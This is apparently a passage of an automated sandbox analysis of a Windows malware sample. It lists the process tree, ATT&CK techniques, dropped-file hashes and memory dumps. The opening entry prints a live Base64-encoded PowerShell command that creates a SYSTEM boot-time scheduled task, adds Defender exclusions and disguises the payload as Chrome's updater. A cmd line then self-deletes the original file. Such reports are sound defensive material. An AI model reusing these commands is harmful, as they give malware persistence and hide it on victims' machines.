"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYwB4AG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAZAB3AEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBhAFEAQgAwAEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwB6AHIAbABtACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAdwBzACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAZQB1AHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBpAGEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAxADYANgA5ADEAYQAwADIANgAwADAAMgA5ADgAMABjADEAZgBhAGMANAAyADgANgAxADAAZAA3ADMAYwBhADkANgAzADgANAAyADAAZAAyAGUAMwBmAGEANwA5AGMAOABkADEAYQA4ADIAOAA0ADMAOAA4AGUAZQAzADAANwBiAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAbwB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBhAHYAYQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"
3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
3⤵
PID:2196

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Suspicious use of SetWindowsHookEx
PID:2632

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:3836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2480

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2104

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1860

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1380

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.6MB

MD5
c0827a7bd617a2fcd31a3d751152c2e0

SHA1
2d58f48e54e1c54e7b63e7ba2c9f50323994242a

SHA256
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

SHA512
cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.6MB

MD5
c0827a7bd617a2fcd31a3d751152c2e0

SHA1
2d58f48e54e1c54e7b63e7ba2c9f50323994242a

SHA256
16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

SHA512
cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A0F.tmp.csv
Filesize
39KB

MD5
d59ad19576801f3cf664beb1abece8e1

SHA1
6897c66a3ccdc2168476da0d8adce4d5bd5e690f

SHA256
0686d9d8238fb3c2fadcc5489a8e01b6fbe8aac44dac4a3510f4f7b327c074d8

SHA512
441077e6e0520d88dad521e33876eef510cfc746e835a8b178ed706ad86ef9196dd7faacb10daccff5aa659f1b031cef4c6bf59b7c7a2a83c6f75d2215c6db16

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B87.tmp.txt
Filesize
13KB

MD5
8df61607f396bda190af2a92c6a794cc

SHA1
ea329e1b82dd340fdad479328b231c78c4832256

SHA256
44234a112c0735b4d6240bc08d9a4013fd60d8fdca818e208e0ef08e81f6746c

SHA512
5850807b8627b78ae625548bda3a8d76688e0d0d95650d66709f0d70f576312ec8c113c49718ddf25b6b1e56002b0aa6b077b28e960f74a9c4c8d5397c14577d

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BA8.tmp.csv
Filesize
39KB

MD5
cf603115f3339d15fea53fe118f4880b

SHA1
edcb64d2a2a856b9df6463bdae1e397ebd53c89e

SHA256
c3a8a1cb6419aa5234a6e3cf9265d4ca190b4a6a6b5a4976eeb34d1ec6ea19f1

SHA512
e33b740f3e368d43b15a78df60c323a9c2a588c76de9046fcd6ac024c66b17eb86d4dceedcd025640b130068ea19de540c2ac8a3e3c76c070be1f2a7c27efc68

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C26.tmp.txt
Filesize
13KB

MD5
d129b6ffcf1bcb520f161c394223dad5

SHA1
350bee117e9a56039336dc792e38297aba0c4884

SHA256
7ce7e716a17c9494665eb54d1f4072cb5aa5fd57380727bad4649335520c99cb

SHA512
9e5548be25000bbde354570f072d1fa0f152ad1e80f7fb9af5cece0d547255fda4ffa826bd24abe583f0064f987c16934c3a34e475dce8d5b73e8ee5687f0fc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e6b9e03dcde217fc7d1692b3d65233d7

SHA1
67367ef59dbc1661ff29d6fe5ce3ed3d39678044

SHA256
790c142b39325b5bcf07c2d7b8afb8fb3b6f8c1e99a39ce5870b2ef043d8cfdd

SHA512
8f34d037a97f1131ff9863c10ff7cf7f029c2973c5f32fcee1751cd47a5b7cfc3bf5b6c30ada08f3793918e600d4a45f8cb8d22502b693c6a9aeba9d0d504410

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8e7a623fcc311b5017c82b1181911569

SHA1
048d36afc6481760c53cff348c05744d98f3cce7

SHA256
9d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d

SHA512
3848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
190cc2feb6fbf6a6143f296ebe043de5

SHA1
8fa72a99c46ed77b602476c85ca2d8ea251b22fb

SHA256
4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206

SHA512
94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
860B

MD5
63b960c8d33c756293dfca7f8a2c50f3

SHA1
958b4e2fc745072879c19de73620b84a8500a190

SHA256
2f513fa3cf9778985ed1f58d33cc575723825ec57ed91dae1e9aa340b2721969

SHA512
799747ff0038f8b2d87bead690b2101ca7fa92f84186ece14c0f1d362ece9d89ca7898e390136eb888cc4f052ad21e5c9a78d67d27b76e13740f964d4eebe536

Download Submit
memory/212-138-0x0000000000000000-mapping.dmp

Download
memory/328-273-0x000001BCEEF10000-0x000001BCEEF3A000-memory.dmp

Filesize
168KB

Download
memory/328-152-0x0000000000000000-mapping.dmp

Download
memory/328-261-0x0000000000000000-mapping.dmp

Download
memory/424-201-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/424-264-0x000002162A4C0000-0x000002162A4EA000-memory.dmp

Filesize
168KB

Download
memory/504-483-0x0000000000000000-mapping.dmp

Download
memory/600-197-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/600-195-0x000001FF41540000-0x000001FF41563000-memory.dmp

Filesize
140KB

Download
memory/600-239-0x000001FF41910000-0x000001FF4193A000-memory.dmp

Filesize
168KB

Download
memory/660-198-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/660-254-0x00000211B0200000-0x00000211B022A000-memory.dmp

Filesize
168KB

Download
memory/668-248-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/848-202-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/848-266-0x0000018C2B6B0000-0x0000018C2B6DA000-memory.dmp

Filesize
168KB

Download
memory/920-250-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/940-203-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/940-268-0x000001FFFE0F0000-0x000001FFFE11A000-memory.dmp

Filesize
168KB

Download
memory/944-199-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/944-258-0x0000017DCBDF0000-0x0000017DCBE1A000-memory.dmp

Filesize
168KB

Download
memory/992-249-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1000-270-0x0000026AA6160000-0x0000026AA618A000-memory.dmp

Filesize
168KB

Download
memory/1000-204-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1008-196-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1008-256-0x0000021C33AC0000-0x0000021C33AEA000-memory.dmp

Filesize
168KB

Download
memory/1064-156-0x0000000000000000-mapping.dmp

Download
memory/1108-186-0x0000000000000000-mapping.dmp

Download
memory/1152-332-0x0000000000000000-mapping.dmp

Download
memory/1156-530-0x0000000000000000-mapping.dmp

Download
memory/1160-272-0x000001D3CED90000-0x000001D3CEDBA000-memory.dmp

Filesize
168KB

Download
memory/1160-205-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1192-276-0x000002002F340000-0x000002002F36A000-memory.dmp

Filesize
168KB

Download
memory/1192-206-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1224-207-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1224-278-0x000001CA19E30000-0x000001CA19E5A000-memory.dmp

Filesize
168KB

Download
memory/1236-155-0x0000000000000000-mapping.dmp

Download
memory/1312-279-0x000001A6DF5B0000-0x000001A6DF5DA000-memory.dmp

Filesize
168KB

Download
memory/1312-208-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1320-209-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1320-284-0x0000016CCA4E0000-0x0000016CCA50A000-memory.dmp

Filesize
168KB

Download
memory/1368-474-0x0000000000000000-mapping.dmp

Download
memory/1372-210-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1372-285-0x000001E817A60000-0x000001E817A8A000-memory.dmp

Filesize
168KB

Download
memory/1380-289-0x00000268E43A0000-0x00000268E43CA000-memory.dmp

Filesize
168KB

Download
memory/1380-211-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1436-290-0x000002AE3DDC0000-0x000002AE3DDEA000-memory.dmp

Filesize
168KB

Download
memory/1436-212-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1516-537-0x0000000000000000-mapping.dmp

Download
memory/1520-213-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1520-291-0x000002440A290000-0x000002440A2BA000-memory.dmp

Filesize
168KB

Download
memory/1552-292-0x00000227C4970000-0x00000227C499A000-memory.dmp

Filesize
168KB

Download
memory/1552-214-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1624-293-0x00000192176D0000-0x00000192176FA000-memory.dmp

Filesize
168KB

Download
memory/1624-215-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1664-294-0x000002CB03170000-0x000002CB0319A000-memory.dmp

Filesize
168KB

Download
memory/1664-216-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1700-224-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1700-307-0x00000000012A0000-0x00000000012CA000-memory.dmp

Filesize
168KB

Download
memory/1708-179-0x00000000010D0000-0x0000000001106000-memory.dmp

Filesize
216KB

Download
memory/1708-183-0x0000000003CB0000-0x00000000042D8000-memory.dmp

Filesize
6.2MB

Download
memory/1708-194-0x00000000043C0000-0x0000000004426000-memory.dmp

Filesize
408KB

Download
memory/1708-192-0x0000000004350000-0x00000000043B6000-memory.dmp

Filesize
408KB

Download
memory/1708-189-0x0000000003A50000-0x0000000003A72000-memory.dmp

Filesize
136KB

Download
memory/1720-295-0x000001DE90F00000-0x000001DE90F2A000-memory.dmp

Filesize
168KB

Download
memory/1720-217-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1772-187-0x0000000000000000-mapping.dmp

Download
memory/1796-401-0x0000000000000000-mapping.dmp

Download
memory/1808-297-0x00000210F3B50000-0x00000210F3B7A000-memory.dmp

Filesize
168KB

Download
memory/1808-218-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1848-184-0x0000000000000000-mapping.dmp

Download
memory/1860-299-0x0000025202740000-0x000002520276A000-memory.dmp

Filesize
168KB

Download
memory/1860-219-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1904-221-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1904-303-0x000001D198760000-0x000001D19878A000-memory.dmp

Filesize
168KB

Download
memory/1920-220-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/1920-301-0x000001F364330000-0x000001F36435A000-memory.dmp

Filesize
168KB

Download
memory/1960-304-0x000001A26A3D0000-0x000001A26A3FA000-memory.dmp

Filesize
168KB

Download
memory/1960-222-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2008-305-0x000002A1E8140000-0x000002A1E816A000-memory.dmp

Filesize
168KB

Download
memory/2008-223-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2020-137-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/2020-136-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/2020-135-0x00000271E0950000-0x00000271E0972000-memory.dmp

Filesize
136KB

Download
memory/2020-134-0x0000000000000000-mapping.dmp

Download
memory/2076-283-0x0000000000000000-mapping.dmp

Download
memory/2100-540-0x0000000000000000-mapping.dmp

Download
memory/2100-150-0x0000000000000000-mapping.dmp

Download
memory/2104-225-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2104-308-0x00000129BE5B0000-0x00000129BE5DA000-memory.dmp

Filesize
168KB

Download
memory/2112-149-0x0000000000000000-mapping.dmp

Download
memory/2116-310-0x000002655E7C0000-0x000002655E7EA000-memory.dmp

Filesize
168KB

Download
memory/2116-226-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2156-533-0x0000000000000000-mapping.dmp

Download
memory/2184-188-0x0000000000000000-mapping.dmp

Download
memory/2192-354-0x0000000000000000-mapping.dmp

Download
memory/2196-259-0x0000000000000000-mapping.dmp

Download
memory/2320-375-0x0000000000000000-mapping.dmp

Download
memory/2348-233-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2356-478-0x0000000000000000-mapping.dmp

Download
memory/2388-234-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2416-499-0x0000000000000000-mapping.dmp

Download
memory/2456-306-0x0000000000000000-mapping.dmp

Download
memory/2472-232-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2480-231-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2492-230-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2500-173-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2500-172-0x00000001400033F4-mapping.dmp

Download
memory/2500-171-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2500-177-0x00007FF84CE50000-0x00007FF84CF0E000-memory.dmp

Filesize
760KB

Download
memory/2500-180-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2500-182-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/2500-174-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2500-175-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/2516-245-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2520-200-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2520-260-0x0000000003310000-0x000000000333A000-memory.dmp

Filesize
168KB

Download
memory/2524-229-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2540-228-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2540-312-0x0000016C642C0000-0x0000016C642EA000-memory.dmp

Filesize
168KB

Download
memory/2620-235-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2660-227-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2660-311-0x00000216C2000000-0x00000216C202A000-memory.dmp

Filesize
168KB

Download
memory/2672-236-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2680-237-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2744-244-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/2836-148-0x0000000000000000-mapping.dmp

Download
memory/2920-246-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/3008-298-0x0000020E59F50000-0x0000020E59F7A000-memory.dmp

Filesize
168KB

Download
memory/3008-288-0x0000000000000000-mapping.dmp

Download
memory/3008-296-0x0000020E59E00000-0x0000020E59E2A000-memory.dmp

Filesize
168KB

Download
memory/3012-514-0x0000000000000000-mapping.dmp

Download
memory/3060-163-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3060-160-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3060-158-0x0000000140001844-mapping.dmp

Download
memory/3060-162-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3060-159-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3060-157-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3080-238-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/3116-247-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/3280-485-0x0000000000000000-mapping.dmp

Download
memory/3488-141-0x0000000000000000-mapping.dmp

Download
memory/3516-240-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/3672-547-0x0000000000000000-mapping.dmp

Download
memory/3692-142-0x0000000000000000-mapping.dmp

Download
memory/3716-145-0x0000000000000000-mapping.dmp

Download
memory/3728-147-0x0000000000000000-mapping.dmp

Download
memory/3808-241-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

Filesize
64KB

Download
memory/3836-302-0x0000000000000000-mapping.dmp

Download
memory/3856-181-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/3856-178-0x00007FF84CE50000-0x00007FF84CF0E000-memory.dmp

Filesize
760KB

Download
memory/3856-176-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/3856-168-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/3856-169-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/3856-170-0x00007FF84CE50000-0x00007FF84CF0E000-memory.dmp

Filesize
760KB

Download
memory/3948-487-0x0000000000000000-mapping.dmp

Download
memory/4072-139-0x0000000000000000-mapping.dmp

Download
memory/4160-185-0x0000000000000000-mapping.dmp

Download
memory/4188-275-0x0000028D30440000-0x0000028D3046A000-memory.dmp

Filesize
168KB

Download
memory/4188-262-0x0000000000000000-mapping.dmp

Download
memory/4188-271-0x0000028D30410000-0x0000028D3043A000-memory.dmp

Filesize
168KB

Download
memory/4192-167-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/4192-164-0x0000000000000000-mapping.dmp

Download
memory/4192-191-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/4300-190-0x0000000000000000-mapping.dmp

Download
memory/4340-280-0x0000000000000000-mapping.dmp

Download
memory/4340-480-0x0000000000000000-mapping.dmp

Download
memory/4380-144-0x0000000000000000-mapping.dmp

Download
memory/4412-512-0x0000000000000000-mapping.dmp

Download
memory/4492-151-0x0000000000000000-mapping.dmp

Download
memory/4632-153-0x0000000000000000-mapping.dmp

Download
memory/4672-392-0x0000000000000000-mapping.dmp

Download
memory/4732-143-0x0000000000000000-mapping.dmp

Download
memory/4736-242-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmp

